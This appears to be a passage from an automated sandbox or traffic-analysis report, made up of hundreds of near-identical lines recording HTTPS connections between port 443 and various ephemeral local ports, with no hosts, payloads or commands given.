                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
